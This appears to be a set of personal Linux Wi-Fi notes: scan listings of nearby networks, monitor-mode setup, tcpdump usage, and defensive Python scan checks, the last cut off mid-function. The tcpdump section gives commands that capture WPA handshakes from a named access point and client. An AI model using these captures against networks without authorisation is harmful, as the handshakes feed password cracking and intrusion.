 BC:A5:11:99:2E:38  -53      261        0    0   6  360   WPA2 CCMP    PSK   ATTFJ4Br3A_2GEXT
 94:8F:CF:75:BE:00  -64      210     1462    0   1  195   WPA2 CCMP    PSK   ATTB2f6CTA
 C8:C7:50:F5:06:E0  -76      250       28    0   6  195   WPA2 CCMP    PSK   peasants
 86:EA:ED:4F:DA:81  -79      164        0    0   1   65   WPA2 CCMP    PSK   <length:  0>
 F4:17:B8:45:0D:62  -74      157       89    0  11  130   WPA2 CCMP    PSK   ATTB2f6CTA
 A2:17:B8:45:0D:63  -80      113       87    0  11  130   WPA2 CCMP    PSK   <length:  9>
 24:94:CB:8C:AA:76  -87      124       15    0   1  195   WPA2 CCMP    PSK   ARRIS-02DD
 30:E1:71:B2:B8:66  -84      167        0    0   6   65   WPA2 CCMP    PSK   DIRECT-65-HP ENVY 4510
 7C:0C:F6:07:C7:71  -88       38        2    0   1   65   WPA2 CCMP    PSK   Dash-5481
 CC:AB:2C:88:75:04  -90       86       37    0  11  260   WPA2 CCMP    PSK   ATTNYvm2Zc
 38:A0:67:82:D2:44  -90       15        7    0   1  260   WPA2 CCMP    PSK   <length:  0>
 BA:2C:A0:8B:15:63  -90      131        0    0   6   65   OPN                NewThermostat_8B1563
 2C:99:24:61:7F:D9  -91        3        1    0  11  195   WPA2 CCMP    PSK   ARRIS-7FDB
 0C:84:DC:B9:13:58  -78        0        0    0  -1   -1                      <length:  0>
 B0:EE:7B:AF:1E:E5  -90       14        1    0   6  130   WPA2 CCMP    PSK   <length: 22>
 2C:30:33:E7:45:7D  -89       21        0    0   1  130   WPA2 CCMP    PSK   belkin.e80_2GEXT

 BSSID              STATION            PWR   Rate     Lost    Frames  Notes  Probes

 (not associated)   A2:CC:C9:6A:79:1A  -27    0 - 1       0       13
 (not associated)   A4:8D:3B:0F:7D:DD  -52    0 - 1      22      191         Private.net
 (not associated)   FC:52:8D:76:F6:2C  -83    0 - 1       0       29         NETGEAR
 (not associated)   00:57:C1:F9:4F:DD  -88    0 - 1       0        9
 (not associated)   8A:7F:AE:95:4D:FF  -90    0 - 1       0        1
 (not associated)   2C:30:33:E7:45:7D  -93    0 - 1       0       30         belkin.e80
 C8:52:61:97:05:B0  00:13:46:E4:48:61  -69   48e- 1       0       39         ATTFJ4Br3A
 94:8F:CF:75:BE:00  84:EA:ED:4F:DA:81  -79   24e-24e      0     1320
 C8:C7:50:F5:06:E0  BC:A8:A6:C4:E5:32  -76   24e- 6e      0       23
 2C:99:24:61:7F:D9  54:E0:19:F3:D9:41  -90    0 - 1e      0        3
Quitting...
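The iw scan, nmcli and airodump-ng listings above all enumerate nearby access points, and the `iw dev wlan0 station dump` near the top of this section shows the associated AP with MFP: no. Both iw outputs share one shape (a non-indented BSS/Station header followed by indented key: value lines), so one parser covers both. The Python below is an added example written for these notes, not code from the page or from the iw project. It parses that shape and runs two checks a defender wants from a scan: the same SSID advertised with different security settings across BSSIDs (a rogue/evil-twin indicator; CCCCPrivate and CCCCPublic above are fine because they are different SSIDs), and stations associated without 802.11w management frame protection. It also converts the freq: values iw prints into channel numbers, the inverse of the channel/frequency table further down in these notes. The sample outputs are constructed in iw's format with BSSIDs taken from the listings; BSS 02:11:22:33:44:55 is an invented rogue AP added so the mismatch check has something to report.

```python
"""Parse `iw dev <if> scan` / `iw dev <if> station dump` output and run two
defender-side checks over it.  Added example for this notes page, not code
from the page or from iw.  Samples below are constructed in iw's format;
02:11:22:33:44:55 is an invented rogue AP so the mismatch check fires."""
import re
from collections import defaultdict

# 'BSS 88:dc:96:47:d0:af(on wlan0) -- associated' / 'Station 88:dc:... (on wlan0)'
HEADER_RE = re.compile(r"^(BSS|Station)\s+([0-9a-fA-F:]{17})")


def parse_iw_blocks(text):
    """One dict per BSS/Station header with the indented 'key: value' lines
    under it (keys lower-cased).  Bulleted ' * key: value' lines nest under
    the key that introduced them, e.g. 'rsn.authentication suites'."""
    blocks, section = [], None
    for line in text.splitlines():
        m = HEADER_RE.match(line)
        if m:
            blocks.append({"kind": m.group(1), "addr": m.group(2).lower()})
            section = None
            continue
        stripped = line.strip()
        if not blocks or not stripped:
            continue
        nested = stripped.startswith("*")
        key, sep, value = stripped.lstrip("* ").partition(":")
        if not sep:
            continue  # bare capability flags carry no value; skip them
        key = key.strip().lower()
        if nested and section:
            key = f"{section}.{key}"
        else:
            section = key
        blocks[-1][key] = value.strip()
    return blocks


def security_of(bss):
    """Roughly nmcli's SECURITY column: RSN (WPA2/WPA3) plus its AKM,
    WPA1 only, WEP (Privacy bit without an RSN/WPA IE), or open."""
    if "rsn" in bss:
        return "rsn:" + bss.get("rsn.authentication suites", "?").lower()
    if "wpa" in bss:
        return "wpa"
    if "privacy" in bss.get("capability", "").lower():
        return "wep"
    return "open"


def security_mismatches(blocks):
    """SSIDs whose BSSIDs disagree on security (one open, one WPA2-PSK).
    A managed multi-AP deployment is uniform, so this is a rogue/evil-twin
    indicator; the per-BSSID detail says which radio to go and find."""
    by_ssid = defaultdict(dict)
    for b in blocks:
        if b["kind"] == "BSS" and b.get("ssid"):
            by_ssid[b["ssid"]][b["addr"]] = security_of(b)
    return {s: aps for s, aps in by_ssid.items() if len(set(aps.values())) > 1}


def unprotected_stations(blocks):
    """Peers associated without 802.11w management frame protection
    (MFP: no); their sessions can be dropped by forged deauth frames."""
    return [b["addr"] for b in blocks
            if b["kind"] == "Station" and b.get("mfp") == "no"]


def freq_to_channel(mhz):
    """Inverse of the channel/frequency table in the monitor-mode notes:
    2.4 GHz is 2407 + 5*ch (channel 14 = 2484 MHz), 5 GHz is 5000 + 5*ch."""
    mhz = int(float(mhz))
    if mhz == 2484:
        return 14
    if 2412 <= mhz <= 2472 and (mhz - 2407) % 5 == 0:
        return (mhz - 2407) // 5
    if 5000 < mhz < 5925 and mhz % 5 == 0:
        return (mhz - 5000) // 5
    raise ValueError(f"{mhz} MHz is not an 802.11 channel centre frequency")


# Constructed `iw dev wlan0 scan` output (tabs as iw prints them).
SAMPLE_SCAN = """\
BSS 88:dc:96:47:d0:af(on wlan0) -- associated
\tfreq: 5220
\tcapability: ESS Privacy (0x0011)
\tSSID: CCCCPrivate
\tRSN:\t * Version: 1
\t\t * Group cipher: CCMP
\t\t * Pairwise ciphers: CCMP
\t\t * Authentication suites: PSK
BSS 8a:dc:96:47:d0:ae(on wlan0)
\tfreq: 2437
\tcapability: ESS (0x0001)
\tSSID: CCCCPublic
BSS 02:11:22:33:44:55(on wlan0)
\tfreq: 2437
\tcapability: ESS (0x0001)
\tSSID: CCCCPrivate
"""

# Constructed `iw dev wlan0 station dump` output (one associated peer).
SAMPLE_STATIONS = """\
Station 88:dc:96:47:d0:af (on wlan0)
\tsignal:  \t-56 [-58, -56] dBm
\tauthorized:\tyes
\tMFP:\t\tno
"""
```

To use it on live output, replace the two sample strings with the text of `sudo iw dev wlan0 scan` and `sudo iw dev wlan0 station dump` and call `security_mismatches(parse_iw_blocks(scan_text))` and `unprotected_stations(parse_iw_blocks(station_text))`. The extra detail a full scan prints (HT/VHT capability flags, WPS fields) is either skipped, because it has no colon, or stored under keys the checks never read, so it does no harm.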
Examples of WiFi commands:

$ sudo nmcli dev wifi
IN-USE  BSSID              SSID              MODE   CHAN  RATE        SIGNAL  BARS  SECURITY
        C8:52:61:97:05:B0  ATTFJ4Br3A        Infra  6     195 Mbit/s  100     ▂▄▆█  WPA2
        BC:A5:11:99:2E:38  ATTFJ4Br3A_2GEXT  Infra  6     130 Mbit/s  100     ▂▄▆█  WPA2
*       C6:52:61:97:05:B3  ATTFJ4Br3A        Infra  153   540 Mbit/s  77      ▂▄▆_  WPA2
        C8:52:61:97:05:B3  --                Infra  153   540 Mbit/s  65      ▂▄▆_  WPA2
        C8:C7:50:F5:06:E0  peasants          Infra  11    195 Mbit/s  54      ▂▄__  WPA2
        94:8F:CF:75:BE:00  ATTB2f6CTA        Infra  1     195 Mbit/s  52      ▂▄__  WPA2
        86:8F:CF:75:BE:03  ATTB2f6CTA        Infra  36    540 Mbit/s  27      ▂___  WPA2
        94:8F:CF:75:BE:03  --                Infra  36    540 Mbit/s  27      ▂___  WPA2
        86:EA:ED:4F:DA:81  --                Infra  1     65 Mbit/s   19      ▂___  WPA2

IN-USE  BSSID              SSID              MODE   CHAN  RATE        SIGNAL  BARS  SECURITY
        C8:52:61:97:05:B0  ATTFJ4Br3A        Infra  6     195 Mbit/s  100     ▂▄▆█  WPA2
        C6:52:61:97:05:B3  ATTFJ4Br3A        Infra  153   540 Mbit/s  87      ▂▄▆█  WPA2
        BC:A5:11:99:2E:38  ATTFJ4Br3A_2GEXT  Infra  6     130 Mbit/s  82      ▂▄▆█  WPA2
        DA:31:34:68:77:AF  --                Infra  153   130 Mbit/s  69      ▂▄▆_  WPA2
        94:8F:CF:75:BE:00  ATTB2f6CTA        Infra  1     195 Mbit/s  55      ▂▄__  WPA2
        BC:A5:11:99:2E:3A  ATTFJ4Br3A_5GEXT  Infra  153   270 Mbit/s  55      ▂▄__  WPA2
        F4:17:B8:45:0D:62  ATTB2f6CTA        Infra  11    130 Mbit/s  35      ▂▄__  WPA2
        86:8F:CF:75:BE:03  ATTB2f6CTA        Infra  36    540 Mbit/s  24      ▂___  WPA2
        24:94:CB:8C:AA:76  ARRIS-02DD        Infra  1     195 Mbit/s  22      ▂___  WPA2

$ sudo nmcli connection show ATTFJ4Br3A
(Long output)

$ sudo iwlist wlan0 scan
wlan0     Scan completed :
          Cell 01 - Address: BC:A5:11:99:2E:38
                    Channel:6
                    Frequency:2.437 GHz (Channel 6)
                    Quality=57/70  Signal level=-53 dBm
                    Encryption key:on
                    ESSID:"ATTFJ4Br3A_2GEXT"
                    Bit Rates:1 Mb/s; 2 Mb/s; 5.5 Mb/s; 11 Mb/s; 6 Mb/s
                              9 Mb/s; 12 Mb/s; 18 Mb/s
                    Bit Rates:24 Mb/s; 36 Mb/s; 48 Mb/s; 54 Mb/s
                    Mode:Master
                    Extra:tsf=0000085943501c01
                    Extra: Last beacon: 1216ms ago
                    IE: Unknown: 0010415454464A34427233415F3247455854
                    IE: Unknown: 010882848B960C121824
                    IE: Unknown: 030106
                    IE: Unknown: 0706555320010B1E
                    IE: Unknown: 2A0104
                    IE: Unknown: 32043048606C
                    IE: Unknown: 2D1AAD0903FFFF000000000000000000000100000000000000000000
                    IE: Unknown: 3D1606000400000000000000000000000000000000000000
                    IE: Unknown: 4A0E14000A002C01C800140005001900
                    IE: Unknown: 7F0801000F0200000040
                    IE: Unknown: BF0CB2498933FAFF0000FAFF0000
                    IE: Unknown: C005000000FCFF
                    IE: Unknown: DD180050F2020101800003A4000027A4000042435E0062322F00
                    IE: Unknown: DD0900037F01010000FF7F
                    IE: Unknown: DD870050F204104A0001101044000102103B00010310470010876543219ABCDEF01234BCA511992E38102100044E5447521023000845583631353076321024000256321042000D344C56363942355941303044361054000800060050F204000110110015455836313530763228576972656C657373204150291008000220081049000600372A000120
                    IE: IEEE 802.11i/WPA2 Version 1
                        Group Cipher : CCMP
                        Pairwise Ciphers (1) : CCMP
                        Authentication Suites (1) : PSK

$ iw dev
phy#1
	Interface wlan1
		ifindex 4
		wdev 0x100000001
		addr 00:c0:ca:b1:5c:55
		ssid ATTFJ4Br3A
		type managed
		txpower 20.00 dBm
phy#0
	Unnamed/non-netdev interface
		wdev 0x2
		addr b0:7d:64:e7:ba:a3
		type P2P-device
		txpower 0.00 dBm
	Interface wlan0
		ifindex 3
		wdev 0x1
		addr fa:7d:f0:56:ce:7e
		type managed
		txpower 22.00 dBm
		multicast TXQ:
			qsz-byt	qsz-pkt	flows	drops	marks	overlmt	hashcol	tx-bytes	tx-packets
			0	0	0	0	0	0	0	0	0

$ ip route show
default via 192.168.1.254 dev wlan1 proto dhcp src 192.168.1.241 metric 600
192.168.1.0/24 dev wlan1 proto kernel scope link src 192.168.1.241 metric 600

$ sudo ip link show wlan1
4: wlan1: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 2312 qdisc mq state UP mode DORMANT group default qlen 1000
    link/ether 00:c0:ca:b1:5c:55 brd ff:ff:ff:ff:ff:ff

$ iw wlan1 link
Connected to c6:52:61:97:05:b3 (on wlan1)
	SSID: ATTFJ4Br3A
	freq: 5765
	signal: -51 dBm
	tx bitrate: 434.0 MBit/s

	bss flags:	short-slot-time
	dtim period:	0
	beacon int:	100

$ nmcli -f ALL dev wifi
NAME    SSID              SSID-HEX                          BSSID              MODE   CHAN  FREQ      RATE        SIGNAL  BARS  SECURITY  WPA-FLAGS  RSN-FLAGS                 DEVICE  ACTIVE  IN-USE  DBUS-PATH
AP[1]   ATTFJ4Br3A        415454464A3442723341              C8:52:61:97:05:B0  Infra  6     2437 MHz  195 Mbit/s  100     ▂▄▆█  WPA2      (none)     pair_ccmp group_ccmp psk  wlan1   no              /org/freedesktop/NetworkManager/AccessPoint/145
AP[2]   ATTFJ4Br3A_2GEXT  415454464A34427233415F3247455854  BC:A5:11:99:2E:38  Infra  6     2437 MHz  130 Mbit/s  100     ▂▄▆█  WPA2      (none)     pair_ccmp group_ccmp psk  wlan1   no              /org/freedesktop/NetworkManager/AccessPoint/144
AP[3]   ATTFJ4Br3A        415454464A3442723341              C6:52:61:97:05:B3  Infra  153   5765 MHz  540 Mbit/s  77      ▂▄▆_  WPA2      (none)     pair_ccmp group_ccmp psk  wlan1   yes     *       /org/freedesktop/NetworkManager/AccessPoint/71
AP[4]   ATTB2f6CTA        41545442326636435441              94:8F:CF:75:BE:00  Infra  1     2412 MHz  195 Mbit/s  70      ▂▄▆_  WPA2      (none)     pair_ccmp group_ccmp psk  wlan1   no              /org/freedesktop/NetworkManager/AccessPoint/147
AP[5]   --                --                                DA:31:34:68:77:AF  Infra  153   5765 MHz  130 Mbit/s  70      ▂▄▆_  WPA2      (none)     pair_ccmp group_ccmp psk  wlan1   no              /org/freedesktop/NetworkManager/AccessPoint/143
AP[6]   peasants          70656173616E7473                  C8:C7:50:F5:06:E0  Infra  11    2462 MHz  195 Mbit/s  57      ▂▄▆_  WPA2      (none)     pair_ccmp group_ccmp psk  wlan1   no              /org/freedesktop/NetworkManager/AccessPoint/146
AP[7]   ATTB2f6CTA        41545442326636435441              F4:17:B8:45:0D:62  Infra  11    2462 MHz  130 Mbit/s  50      ▂▄__  WPA2      (none)     pair_ccmp group_ccmp psk  wlan1   no              /org/freedesktop/NetworkManager/AccessPoint/149
AP[8]   --                --                                94:8F:CF:75:BE:03  Infra  36    5180 MHz  540 Mbit/s  29      ▂___  WPA2      (none)     pair_ccmp group_ccmp psk  wlan1   no              /org/freedesktop/NetworkManager/AccessPoint/150
AP[9]   ATTB2f6CTA        41545442326636435441              86:8F:CF:75:BE:03  Infra  36    5180 MHz  540 Mbit/s  27      ▂___  WPA2      (none)     pair_ccmp group_ccmp psk  wlan1   no              /org/freedesktop/NetworkManager/AccessPoint/151
AP[10]  --                --                                86:EA:ED:4F:DA:81  Infra  1     2412 MHz  65 Mbit/s   19      ▂___  WPA2      (none)     pair_ccmp group_ccmp psk  wlan1   no              /org/freedesktop/NetworkManager/AccessPoint/148

NAME    SSID              SSID-HEX                          BSSID              MODE   CHAN  FREQ      RATE        SIGNAL  BARS  SECURITY  WPA-FLAGS  RSN-FLAGS                 DEVICE  ACTIVE  IN-USE  DBUS-PATH
AP[1]   ATTFJ4Br3A        415454464A3442723341              C8:52:61:97:05:B0  Infra  6     2437 MHz  195 Mbit/s  100     ▂▄▆█  WPA2      (none)     pair_ccmp group_ccmp psk  wlan0   no              /org/freedesktop/NetworkManager/AccessPoint/30
AP[2]   ATTFJ4Br3A        415454464A3442723341              C6:52:61:97:05:B3  Infra  153   5765 MHz  540 Mbit/s  82      ▂▄▆█  WPA2      (none)     pair_ccmp group_ccmp psk  wlan0   no              /org/freedesktop/NetworkManager/AccessPoint/2
AP[3]   ATTFJ4Br3A_2GEXT  415454464A34427233415F3247455854  BC:A5:11:99:2E:38  Infra  6     2437 MHz  130 Mbit/s  80      ▂▄▆_  WPA2      (none)     pair_ccmp group_ccmp psk  wlan0   no              /org/freedesktop/NetworkManager/AccessPoint/31
AP[4]   --                --                                C8:52:61:97:05:B3  Infra  153   5765 MHz  540 Mbit/s  74      ▂▄▆_  WPA2      (none)     pair_ccmp group_ccmp psk  wlan0   no              /org/freedesktop/NetworkManager/AccessPoint/140
AP[5]   ATTFJ4Br3A_5GEXT  415454464A34427233415F3547455854  BC:A5:11:99:2E:3A  Infra  153   5765 MHz  270 Mbit/s  57      ▂▄▆_  WPA2      (none)     pair_ccmp group_ccmp psk  wlan0   no              /org/freedesktop/NetworkManager/AccessPoint/29
AP[6]   ATTB2f6CTA        41545442326636435441              94:8F:CF:75:BE:00  Infra  1     2412 MHz  195 Mbit/s  47      ▂▄__  WPA2      (none)     pair_ccmp group_ccmp psk  wlan0   no              /org/freedesktop/NetworkManager/AccessPoint/32
AP[7]   peasants          70656173616E7473                  C8:C7:50:F5:06:E0  Infra  11    2462 MHz  195 Mbit/s  29      ▂___  WPA2      (none)     pair_ccmp group_ccmp psk  wlan0   no              /org/freedesktop/NetworkManager/AccessPoint/97
AP[8]   ATTB2f6CTA        41545442326636435441              F4:17:B8:45:0D:62  Infra  11    2462 MHz  130 Mbit/s  24      ▂___  WPA2      (none)     pair_ccmp group_ccmp psk  wlan0   no              /org/freedesktop/NetworkManager/AccessPoint/122
AP[9]   ATTB2f6CTA        41545442326636435441              86:8F:CF:75:BE:03  Infra  36    5180 MHz  540 Mbit/s  15      ▂___  WPA2      (none)     pair_ccmp group_ccmp psk  wlan0   no              /org/freedesktop/NetworkManager/AccessPoint/38

$ nmcli -m multiline -f ALL dev wifi
NAME:       AP[1]
SSID:       ATTFJ4Br3A
SSID-HEX:   415454464A3442723341
BSSID:      C8:52:61:97:05:B0
MODE:       Infra
CHAN:       6
FREQ:       2437 MHz
RATE:       195 Mbit/s
SIGNAL:     100
BARS:       ▂▄▆█
SECURITY:   WPA2
WPA-FLAGS:  (none)
RSN-FLAGS:  pair_ccmp group_ccmp psk
DEVICE:     wlan1
ACTIVE:     no
IN-USE:
DBUS-PATH:  /org/freedesktop/NetworkManager/AccessPoint/145
NAME:       AP[2]
SSID:       ATTFJ4Br3A_2GEXT
SSID-HEX:   415454464A34427233415F3247455854
BSSID:      BC:A5:11:99:2E:38
MODE:       Infra
CHAN:       6
FREQ:       2437 MHz
RATE:       130 Mbit/s
SIGNAL:     100
BARS:       ▂▄▆█
SECURITY:   WPA2
WPA-FLAGS:  (none)
RSN-FLAGS:  pair_ccmp group_ccmp psk
DEVICE:     wlan1
ACTIVE:     no
IN-USE:
DBUS-PATH:  /org/freedesktop/NetworkManager/AccessPoint/144
NAME:       AP[3]
SSID:       ATTFJ4Br3A
SSID-HEX:   415454464A3442723341
BSSID:      C6:52:61:97:05:B3
MODE:       Infra
CHAN:       153
FREQ:       5765 MHz
RATE:       540 Mbit/s
SIGNAL:     77
BARS:       ▂▄▆_
SECURITY:   WPA2
WPA-FLAGS:  (none)
RSN-FLAGS:  pair_ccmp group_ccmp psk
DEVICE:     wlan1
ACTIVE:     yes
IN-USE:     *
DBUS-PATH:  /org/freedesktop/NetworkManager/AccessPoint/71
NAME:       AP[4]

Now I switch to a longer antenna and check to see if there is a difference in the numbers above.

$ iwconfig
lo        no wireless extensions.

eth0      no wireless extensions.

wlan0     IEEE 802.11  ESSID:off/any
          Mode:Managed  Access Point: Not-Associated   Tx-Power=22 dBm
          Retry short limit:7   RTS thr:off   Fragment thr:off
          Power Management:on

wlan1     IEEE 802.11AC  ESSID:"ATTFJ4Br3A"  Nickname:"<WIFI@REALTEK>"
          Mode:Managed  Frequency:5.765 GHz  Access Point: C6:52:61:97:05:B3
          Bit Rate:434 Mb/s   Sensitivity:0/0
          Retry:off   RTS thr:off   Fragment thr:off
          Power Management:off
          Link Quality=81/100  Signal level=-50 dBm  Noise level=0 dBm
          Rx invalid nwid:0  Rx invalid crypt:0  Rx invalid frag:0
          Tx excessive retries:0  Invalid misc:0   Missed beacon:0

$ ifconfig
eth0: flags=4099<UP,BROADCAST,MULTICAST>  mtu 1500
        ether c0:25:a5:16:53:2d  txqueuelen 1000  (Ethernet)
        RX packets 0  bytes 0 (0.0 B)
        RX errors 0  dropped 0  overruns 0  frame 0
        TX packets 0  bytes 0 (0.0 B)
        TX errors 0  dropped 0  overruns 0  carrier 0  collisions 0
        device interrupt 45  base 0xf000

lo: flags=73<UP,LOOPBACK,RUNNING>  mtu 65536
        inet 127.0.0.1  netmask 255.0.0.0
        loop  txqueuelen 1000  (Local Loopback)
        RX packets 104  bytes 8879 (8.6 KiB)
        RX errors 0  dropped 0  overruns 0  frame 0
        TX packets 104  bytes 8879 (8.6 KiB)
        TX errors 0  dropped 0  overruns 0  carrier 0  collisions 0

wlan0: flags=4099<UP,BROADCAST,MULTICAST>  mtu 1500
        ether 9a:80:4e:f6:74:05  txqueuelen 1000  (Ethernet)
        RX packets 4752  bytes 2476317 (2.3 MiB)
        RX errors 0  dropped 1001  overruns 0  frame 0
        TX packets 998  bytes 160486 (156.7 KiB)
        TX errors 0  dropped 0  overruns 0  carrier 0  collisions 0

wlan1: flags=4163<UP,BROADCAST,RUNNING,MULTICAST>  mtu 2312
        inet 192.168.1.241  netmask 255.255.255.0  broadcast 192.168.1.255
        inet6 2600:1700:43f0:d60::27  prefixlen 128  scopeid 0x0<global>
        inet6 fe80::2c0:caff:feb1:5c55  prefixlen 64  scopeid 0x20<link>
        inet6 2600:1700:43f0:d60:ae69:4033:ea03:23f9  prefixlen 64  scopeid 0x0<global>
        inet6 2600:1700:43f0:d60:2c0:caff:feb1:5c55  prefixlen 64  scopeid 0x0<global>
        ether 00:c0:ca:b1:5c:55  txqueuelen 1000  (Ethernet)
        RX packets 19  bytes 3335 (3.2 KiB)
        RX errors 0  dropped 6  overruns 0  frame 0
        TX packets 24  bytes 3016 (2.9 KiB)
        TX errors 0  dropped 0  overruns 0  carrier 0  collisions 0

To check whether your Linux kernel driver supports monitor mode, use the following command:
iw list | grep -i "supported interface modes" -A 20 | grep "* monitor"

Let's create a new interface called mon0, delete the existing interface and finally bring the new interface up. Don't forget to replace the interface name (wlan0 below) with yours.

# Create new interface called mon0
sudo iw phy phy0 interface add mon0 type monitor
sudo iw dev wlan0 del          # Replace wlan0 with your interface name
sudo ip link set mon0 up       # Bring up the interface mon0

You can check whether your wireless interface mon0 was created successfully in monitor mode using the following command:
iw dev

Obviously you are going to capture wireless traffic for a certain channel, for example channel 44, 60 or 112. We need to set the respective channel frequency to be captured by mon0. You can find the frequency of a given channel in the following table.

Channel  Frequency (MHz)
1        2412
6        2437
11       2462
36       5180
40       5200
44       5220
48       5240
52       5260
56       5280
60       5300
64       5320
100      5500
104      5520
108      5540
112      5560
116      5580
120      5600
124      5620
128      5640
132      5660
136      5680
140      5700
144      5720
149      5745

Now set the channel frequency using the following command:
sudo iw dev mon0 set freq <Channel Freq>

Wireshark is a packet analyzer.
We can select the specific interface, in this case mon0, and then start capturing. Run the following command in terminal to install wireshark. sudo apt install wireshark sudo usermod -a -G wireshark $USER sudo adduser $USER wireshark To restore your original interface and to delete the mon0 interface, run the following commands. Replace wlan0 with your original wifi interface noted at the starting of the tutorial. sudo iw dev mon0 del sudo iw phy phy0 interface add wlan0 type managed https://www.nayab.xyz/networking/capture-wireless-packets-monitor-mode-linux tcpdump and wifi iwconfig # list all devices ifconfig wlan0 down # assuming wlan0 is wireless iwconfig wlan0 mode monitor # put into monitor mode ifconfig wlan0 up # bring wlan0 online Set the channel $ iwconfig wlan0 channel 3 $ iw wlan0 info Interface wlan0 ifindex 3 wdev 0x1 addr b0:7d:64:e7:ba:a3 ssid ATTFJ4Br3A type managed wiphy 0 channel 153 (5765 MHz), width: 80 MHz, center1: 5775 MHz txpower 22.00 dBm multicast TXQ: qsz-byt qsz-pkt flows drops marks overlmt hashcol tx-bytes tx-packets 0 0 0 0 0 0 0 0 0 $ tcpdump -D 1.wlan0 [Up, Running, Wireless, Associated] 2.phy0.mon [Up, Running, Wireless, Associated] 3.any (Pseudo-device that captures on all interfaces) [Up, Running] 4.lo [Up, Running, Loopback] 5.eth0 [Up, Disconnected] 6.bluetooth1 (Bluetooth adapter number 0) [Wireless, Association status unknown] 7.bluetooth0 (Bluetooth adapter number 1) [Wireless, Association status unknown] 8.bluetooth-monitor (Bluetooth Linux Monitor) [Wireless] 9.nflog (Linux netfilter log (NFLOG) interface) [none] 10.nfqueue (Linux netfilter queue (NFQUEUE) interface) [none] 11.dbus-system (D-Bus system bus) [none] 12.dbus-session (D-Bus session bus) [none] $ iwlist wlan0 frequency wlan0 32 channels in total; available frequencies : Channel 01 : 2.412 GHz Channel 02 : 2.417 GHz Channel 03 : 2.422 GHz Channel 04 : 2.427 GHz Channel 05 : 2.432 GHz Channel 06 : 2.437 GHz Channel 07 : 2.442 GHz Channel 08 : 2.447 GHz Channel 
09 : 2.452 GHz Channel 10 : 2.457 GHz Channel 11 : 2.462 GHz Channel 12 : 2.467 GHz Channel 13 : 2.472 GHz Channel 36 : 5.18 GHz Channel 40 : 5.2 GHz Channel 44 : 5.22 GHz Channel 48 : 5.24 GHz Channel 52 : 5.26 GHz Channel 56 : 5.28 GHz Channel 60 : 5.3 GHz Channel 64 : 5.32 GHz Channel 100 : 5.5 GHz Channel 104 : 5.52 GHz Channel 108 : 5.54 GHz Channel 112 : 5.56 GHz Channel 116 : 5.58 GHz Channel 120 : 5.6 GHz Channel 124 : 5.62 GHz Channel 128 : 5.64 GHz Channel 132 : 5.66 GHz Channel 136 : 5.68 GHz Channel 140 : 5.7 GHz Current Frequency:5.765 GHz Scan on a specific interface; $ tcpdump -i wlan0 To run tcpdump on an interface in monitoring mode, we can use the -I flag: $ tcpdump -I $ tcpdump -i wlan0 -I Suppressing Address Lookup $ tcpdump -n Switch the interface from managed to monitor mode and switch the channel to 149 (my home network): root@kali:~# ip link set wlan0 down root@kali:~# iw wlan0 set monitor control root@kali:~# iw wlan0 set channel 153 root@kali:~# ip link set wlan0 up Run tcpdump with the interface in monitor mode. We are now capturing the layer 1 (IEEE802_11_RADIO) traffic in the air: root@kali:~# sudo tcpdump -i wlan0 -n In order for tcpdump to filter only handshake frames, use a filter: ether proto 0x888e When capturing handshakes, it is recommended that you always specify the -U option, so that data is immediately written to a file. An example of capturing all handshakes (for any Access Points and clients) and saving them to the test.cap file: sudo tcpdump -i wlan0 -I -w test.cap -e -U ether proto 0x888e Let’s consider the practical situation: you need to capture a handshake from the access point with BSSID 14:9d:09:d0:04:84, which works on channel 8. To capture, I will use a wireless interface named wlp0s20f0u1. To achieve this goal, you need to start by switching the wireless card to the desired channel. Keep in mind that NetworkManager and other programs can automatically switch wireless interfaces to other channels. 
Therefore, you must either stop the NetworkManager service: sudo systemctl stop NetworkManager.service To switch the Wi-Fi card to a specific channel, use the sequence of commands: sudo ip link set wlan0 down sudo iw wlan0 set monitor control sudo ip link set wlan0 up sudo iw wlan0 set channel 153 An example of a real command that uses the wlan0 interface to capture a handshake, the handshake is saved to the test.cap file, the MAC address of the AP is 14:9d:09:d0:04:84, and the client's MAC address is c0:b6:f9:da:af:3e: $ sudo tcpdump -i wlan0 -I -w test.cap -e -U -c 4 'ether proto 0x888e and (wlan addr1 14:9d:09:d0:04:84 or wlan addr1 c0:b6:f9:da:af:3e)' Ref https://miloserdov.org/?p=3687 Change your DNS servers on Linux Here’s how to change your DNS servers on Linux: Open the terminal by pressing Ctrl + T Enter the following command to become the root user: su Once you’ve entered your root password, run these commands: rm -r /etc/resolv.conf nano /etc/resolv.conf When the text editor opens, type in the following lines: nameserver 103.86.96.100 nameserver 103.86.99.100 Close and save the file. You can do so by clicking Ctrl + X and pressing Y. Continue typing in the terminal: chattr +i /etc/resolv.conf reboot now That’s it! You are now using NordVPN’s DNS servers. sngrep Sngrep is a tool to capture SIP traffic and display the call flow in a terminal nicely. It is made by Irontec and it is in development. Sngrep supports live capture to display realtime SIP packets and can also be used as “.pcap” viewer. To open a .pcap file with sngrep, just execute the next command: $ sngrep -I sngrep_test.pcap TESTING YOUR SIP PROTOCOL VIA SIPP https://freelinuxtutorials.com/testing-your-sip-protocol-via-sipp/ sippts https://pepelux.github.io/sippts/ sipp https://github.com/SIPp/sipp To sort IP addresses numericly $ sort -t . -k 1,1n -k 2,2n -k 3,3n -k 4,4n arp-scan.wifi.071722.1147.txt
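The nmcli multiline listing and the channel table above suggest a quick sanity check a defender can run over a scan. The following is an added example (not part of these notes, nor NetworkManager code): it parses the `nmcli -m multiline` record layout from a constructed sample, flags open or WEP networks, locally administered BSSIDs and SSIDs served by more than one BSSID, and cross-checks CHAN against FREQ with the 802.11 rule that generates the table above (2407 + 5n MHz for 2.4 GHz channel n, 2484 for channel 14, 5000 + 5n for 5 GHz).

```python
# Added example: audit an `nmcli -m multiline -f ALL dev wifi` listing.
from collections import defaultdict

# Constructed sample in nmcli's multiline layout; only the fields used here are
# kept, and SSIDs/BSSIDs are made up.
SAMPLE = """\
NAME: AP[1]
SSID: HomeNet
BSSID: C8:52:61:00:00:B0
CHAN: 6
FREQ: 2437 MHz
SECURITY: WPA2
RSN-FLAGS: pair_ccmp group_ccmp psk
NAME: AP[2]
SSID: HomeNet
BSSID: C6:52:61:00:00:B3
CHAN: 153
FREQ: 5765 MHz
SECURITY: WPA2
RSN-FLAGS: pair_ccmp group_ccmp psk
NAME: AP[3]
SSID: CoffeeShop
BSSID: 00:11:22:33:44:55
CHAN: 11
FREQ: 2437 MHz
SECURITY:
RSN-FLAGS: (none)
"""

def channel_to_mhz(chan):
    """IEEE 802.11 channel number -> centre frequency in MHz, or None if unknown."""
    if 1 <= chan <= 13:
        return 2407 + 5 * chan
    if chan == 14:
        return 2484
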